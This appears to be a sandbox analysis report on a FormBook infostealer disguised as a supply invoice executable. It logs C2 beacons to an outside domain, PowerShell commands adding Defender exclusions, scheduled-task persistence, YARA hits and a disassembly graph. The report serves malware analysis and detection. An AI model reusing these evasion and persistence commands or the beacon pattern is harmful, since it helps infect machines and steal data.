                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 77 76 34 32 70 5a 41 4c 4e 6f 6a 50 39 68 6f 57 71 51 34 7a 45 58 56 33 42 56 44 7a 61 47 6e 31 6e 74 2f 71 6a 41 62 71 33 39 34 2b 52 75 39 64 69 38 45 43 55 58 4a 79 77 42 45 38 72 6d 61 4d 38 68 57 58 71 74 75 43 7a 6b 69 42 36 43 4f 6c 4f 76 54 33 61 35 43 50 72 31 51 6c 63 73 54 5a 4f 65 68 5a 31 6f 43 79 4d 6f 57 78 52 79 35 6f 32 63 61 6e 2f 2f 33 30 62 56 41 53 57 31 59 33 76 66 52 4f 79 45 77 57 51 4b 30 6e 42 70 76 50 47 67 66 6c 76 44 57 56 6d 51 39 31 75 79 54 68 65 73 63 77 4b 2b 55 6f 50 41 65 6f 6d 55 6e 63 35 2b 63 76 59 31 76 69 71 45 7a 38 2b 6e 62 61 42 37 2f 61 77 78 32 50 43 4f 41 47 37 34 65 36 43 62 6a 4d 72 73 68 33 41 6f 34 4e 44 36 4a 53 49 48 44 2f 5a 70 6d 4e 42 39 42 37 35 42 35 78 7a 54 72 64 6e 36 6f 30 4f 34 44 73 66 64 52 4a 30 74 63 62 6d 6c 72 4f 47 61 30 54 4f 61 65 70 56 63 77 5a 49 61 41 66 4b 57 45 75 44 6a 71 63 72 6e 45 78 74 57 42 70 6d 53 6c 71 65 54 4d 56 4d 51 32 71 77 72 41 76 67 6f 36 55 58 34 42 36 6c 61 32 73 70 42 52 56 4e 42 56 2f [TRUNCATED]
                                                                                                                              Data Ascii: ej6Le=wv42pZALNojP9hoWqQ4zEXV3BVDzaGn1nt/qjAbq394+Ru9di8ECUXJywBE8rmaM8hWXqtuCzkiB6COlOvT3a5CPr1QlcsTZOehZ1oCyMoWxRy5o2can//30bVASW1Y3vfROyEwWQK0nBpvPGgflvDWVmQ91uyThescwK+UoPAeomUnc5+cvY1viqEz8+nbaB7/awx2PCOAG74e6CbjMrsh3Ao4ND6JSIHD/ZpmNB9B75B5xzTrdn6o0O4DsfdRJ0tcbmlrOGa0TOaepVcwZIaAfKWEuDjqcrnExtWBpmSlqeTMVMQ2qwrAvgo6UX4B6la2spBRVNBV/XP26Uy1hBqLMXFTmPku6QsaUjVu6vPpV8xoAFUp/k4qf+tWPTQaswlKaeYPEbonovrJxTO/fBrdQOhr22jy/McnGYimNLK+OsC33dqmuCPYIxcyX1CgjEFa9jvIYyi5USCQKBspA2dDvOb7xatNlxL6JC8EC7c0bmJ430TbIraq8kTWXa+hhGh+NhriIFHfyCKwvZTExFZChTaaaDkvSckDkXMW50BmjcWytVGfSCTKI9FJ9y1+wezNgucZSL6IuXhL17uzli4JK/ARINJMXlqsCUjWsd8rE23TdKuysWBEtdahvDOOgPH1ghcG95QqEYufquicE4o/ksFEtUWo4Inc+VnOa9zXVe0WVzlubYGvSZxwXvW0cl5+cPRMr4xDq8WERhuBXKiaJGYbgl/my8selOlmlRXVYBMod0JIssed/24wkVd5Q9u2keShnAHVWrhiXq9QLCwqNLaVobtmBoGUo86vnKty++4WEsFDwW55eYyz2JaRGM7d0qf4UxDJGWPYDjRvCGBODCvkXZfR96COGq47S0ti9d13GWHkjl67q0rF7dA6CYB2vzFSYAOjCEFx9N2NFxk2R22EcnI1kWGrxNSbLwzyn6ZCaUKaiGMjFuIiE4SJ/30+aLMwYf2paBMcbJCz1spXWsDLNAH+FTef9ZR96nDkqxp [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:36:43.034208059 CEST393INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:42 GMT
                                                                                                                              Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 30 74 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x0tl/ was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              52192.168.2.6500478.217.17.192801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:36:44.664339066 CEST508OUTGET /x0tl/?An=mLdxo2Y8RLRh&ej6Le=9tQWqttnWu7MjGZLyiEcCzdUDF7UN3PBgIeLryHozuROP/1ck4METjVt2AM5oXaP3hSOrK+o7VaG5j6GesXwOMuHrEAdecfGMf0B1/a+f8XsVC4h6LXHmO6QOE5KLV0/obdy6xQ= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.meliorahomes.net
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Target ID:0
                                                                                                                              Start time:06:32:58
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
                                                                                                                              Imagebase:0xf90000
                                                                                                                              File size:949'248 bytes
                                                                                                                              MD5 hash:A903C6FB836F2C2C2762D1FDE269BDB8
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:5
                                                                                                                              Start time:06:33:04
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
                                                                                                                              Imagebase:0x30000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:6
                                                                                                                              Start time:06:33:04
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:7
                                                                                                                              Start time:06:33:04
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"
                                                                                                                              Imagebase:0x30000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:8
                                                                                                                              Start time:06:33:04
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:9
                                                                                                                              Start time:06:33:04
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp"
                                                                                                                              Imagebase:0x200000
                                                                                                                              File size:187'904 bytes
                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:10
                                                                                                                              Start time:06:33:04
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:11
                                                                                                                              Start time:06:33:05
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
                                                                                                                              Imagebase:0xc30000
                                                                                                                              File size:949'248 bytes
                                                                                                                              MD5 hash:A903C6FB836F2C2C2762D1FDE269BDB8
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:12
                                                                                                                              Start time:06:33:07
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
                                                                                                                              Imagebase:0x600000
                                                                                                                              File size:949'248 bytes
                                                                                                                              MD5 hash:A903C6FB836F2C2C2762D1FDE269BDB8
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 47%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:13
                                                                                                                              Start time:06:33:08
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe"
                                                                                                                              Imagebase:0xb20000
                                                                                                                              File size:140'800 bytes
                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:14
                                                                                                                              Start time:06:33:08
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                              Imagebase:0x7ff717f30000
                                                                                                                              File size:496'640 bytes
                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:15
                                                                                                                              Start time:06:33:10
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\SysWOW64\svchost.exe"
                                                                                                                              Imagebase:0x950000
                                                                                                                              File size:46'504 bytes
                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:17
                                                                                                                              Start time:06:33:16
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp"
                                                                                                                              Imagebase:0x200000
                                                                                                                              File size:187'904 bytes
                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:18
                                                                                                                              Start time:06:33:16
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:19
                                                                                                                              Start time:06:33:16
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"
                                                                                                                              Imagebase:0x8d0000
                                                                                                                              File size:949'248 bytes
                                                                                                                              MD5 hash:A903C6FB836F2C2C2762D1FDE269BDB8
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:23
                                                                                                                              Start time:06:33:34
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                              Imagebase:0x7ff728280000
                                                                                                                              File size:676'768 bytes
                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Disassembly

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:9.8%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:135
                                                                                                                                Total number of Limit Nodes:10
                                                                                                                                execution_graph 28427 16c4668 28428 16c467a 28427->28428 28429 16c4686 28428->28429 28433 16c4778 28428->28433 28438 16c3e28 28429->28438 28431 16c46a5 28434 16c479d 28433->28434 28442 16c4878 28434->28442 28446 16c4888 28434->28446 28439 16c3e33 28438->28439 28454 16c5c44 28439->28454 28441 16c6fe0 28441->28431 28444 16c48af 28442->28444 28443 16c498c 28444->28443 28450 16c44b0 28444->28450 28448 16c48af 28446->28448 28447 16c498c 28447->28447 28448->28447 28449 16c44b0 CreateActCtxA 28448->28449 28449->28447 28451 16c5918 CreateActCtxA 28450->28451 28453 16c59db 28451->28453 28453->28453 28455 16c5c4f 28454->28455 28458 16c5c64 28455->28458 28457 16c70ed 28457->28441 28459 16c5c6f 28458->28459 28462 16c5c94 28459->28462 28461 16c71c2 28461->28457 28463 16c5c9f 28462->28463 28466 16c5cc4 28463->28466 28465 16c72c5 28465->28461 28467 16c5ccf 28466->28467 28469 16c85cb 28467->28469 28472 16cac78 28467->28472 28468 16c8609 28468->28465 28469->28468 28476 16ccd68 28469->28476 28481 16caca0 28472->28481 28485 16cacb0 28472->28485 28473 16cac8e 28473->28469 28477 16ccd99 28476->28477 28478 16ccdbd 28477->28478 28493 16ccf18 28477->28493 28497 16ccf28 28477->28497 28478->28468 28482 16cacb0 28481->28482 28488 16cada8 28482->28488 28483 16cacbf 28483->28473 28487 16cada8 GetModuleHandleW 28485->28487 28486 16cacbf 28486->28473 28487->28486 28489 16cadb9 28488->28489 28490 16caddc 28488->28490 28489->28490 28491 16cafe0 GetModuleHandleW 28489->28491 28490->28483 28492 16cb00d 28491->28492 28492->28483 28494 16ccf35 28493->28494 28495 16ccf6f 28494->28495 28501 16cbae0 28494->28501 28495->28478 28498 16ccf35 28497->28498 28499 16cbae0 GetModuleHandleW 28498->28499 28500 16ccf6f 28498->28500 28499->28500 28500->28478 28502 16cbaeb 28501->28502 28504 16cdc88 28502->28504 28505 16cd2dc 28502->28505 28504->28504 28506 16cd2e7 28505->28506 28507 16c5cc4 GetModuleHandleW 28506->28507 28508 16cdcf7 28507->28508 28508->28504 28509 16cd040 28510 16cd086 GetCurrentProcess 28509->28510 28512 16cd0d8 GetCurrentThread 28510->28512 28513 16cd0d1 28510->28513 28514 16cd10e 28512->28514 28515 16cd115 GetCurrentProcess 28512->28515 28513->28512 28514->28515 28517 16cd14b 28515->28517 28516 16cd173 GetCurrentThreadId 28518 16cd1a4 28516->28518 28517->28516 28519 16cd751 28520 16cd714 DuplicateHandle 28519->28520 28522 16cd75a 28519->28522 28521 16cd726 28520->28521 28523 5a79378 28524 5a79397 28523->28524 28526 5a793b0 28523->28526 28527 5a793b9 28526->28527 28530 5a797e8 28527->28530 28528 5a793de 28528->28524 28531 5a79822 28530->28531 28532 5a79833 28530->28532 28531->28528 28533 5a798c1 28532->28533 28536 5a79b12 28532->28536 28541 5a79b20 28532->28541 28533->28528 28537 5a79b48 28536->28537 28538 5a79c4e 28537->28538 28546 5a7a3b0 28537->28546 28551 5a7a39f 28537->28551 28538->28531 28542 5a79b48 28541->28542 28543 5a79c4e 28542->28543 28544 5a7a3b0 DrawTextExW 28542->28544 28545 5a7a39f DrawTextExW 28542->28545 28543->28531 28544->28543 28545->28543 28547 5a7a3c6 28546->28547 28556 5a7a808 28547->28556 28560 5a7a818 28547->28560 28548 5a7a43c 28548->28538 28552 5a7a3c6 28551->28552 28554 5a7a808 DrawTextExW 28552->28554 28555 5a7a818 DrawTextExW 28552->28555 28553 5a7a43c 28553->28538 28554->28553 28555->28553 28564 5a7a849 28556->28564 28569 5a7a858 28556->28569 28557 5a7a836 28557->28548 28561 5a7a836 28560->28561 28562 5a7a849 DrawTextExW 28560->28562 28563 5a7a858 DrawTextExW 28560->28563 28561->28548 28562->28561 28563->28561 28565 5a7a858 28564->28565 28566 5a7a8b6 28565->28566 28574 5a7a8c8 28565->28574 28579 5a7a8d8 28565->28579 28566->28557 28570 5a7a889 28569->28570 28571 5a7a8b6 28570->28571 28572 5a7a8c8 DrawTextExW 28570->28572 28573 5a7a8d8 DrawTextExW 28570->28573 28571->28557 28572->28571 28573->28571 28576 5a7a8d8 28574->28576 28575 5a7a90e 28575->28566 28576->28575 28584 5a796dc 28576->28584 28578 5a7a979 28581 5a7a8f9 28579->28581 28580 5a7a90e 28580->28566 28581->28580 28582 5a796dc DrawTextExW 28581->28582 28583 5a7a979 28582->28583 28586 5a796e7 28584->28586 28585 5a7c939 28585->28578 28586->28585 28590 5a7d497 28586->28590 28594 5a7d4a8 28586->28594 28587 5a7ca4c 28587->28578 28591 5a7d4a8 28590->28591 28597 5a7c324 28591->28597 28595 5a7c324 DrawTextExW 28594->28595 28596 5a7d4c5 28595->28596 28596->28587 28599 5a7d4e0 DrawTextExW 28597->28599 28600 5a7d4c5 28599->28600 28600->28587

                                                                                                                                Executed Functions

                                                                                                                                Function 016CD030 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 016CD0BE
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 016CD0FB
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 016CD138
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 016CD191
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: 994ce9c5975c8dcdb204d338962166efd9f3f7f5c27c23ab9c8c1737c66db0d6
                                                                                                                                • Instruction ID: d7ddc0a66b12556f503aaefa61d3866a42c282be355d21ed346123cf09799e1f
                                                                                                                                • Opcode Fuzzy Hash: 994ce9c5975c8dcdb204d338962166efd9f3f7f5c27c23ab9c8c1737c66db0d6
                                                                                                                                • Instruction Fuzzy Hash: B55155B09013498FEB54DFA9D948BAEBBF1FF88314F20846DE409AB350DB746944CB65
                                                                                                                                Function 016CD040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 016CD0BE
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 016CD0FB
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 016CD138
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 016CD191
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: 87e6bb259f9956d1a24c87dfa7f451348246af21875a5da2e2628716e88ff0a1
                                                                                                                                • Instruction ID: 9cb7a5c419d00e1e26c9f6b013cb5404822740c9732342eb841210c91cd6b8dd
                                                                                                                                • Opcode Fuzzy Hash: 87e6bb259f9956d1a24c87dfa7f451348246af21875a5da2e2628716e88ff0a1
                                                                                                                                • Instruction Fuzzy Hash: E45166B09013498FEB54DFA9D948BAEBBF1FF88314F20842DE109A7350DB75A844CB65
                                                                                                                                Function 016CADA8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
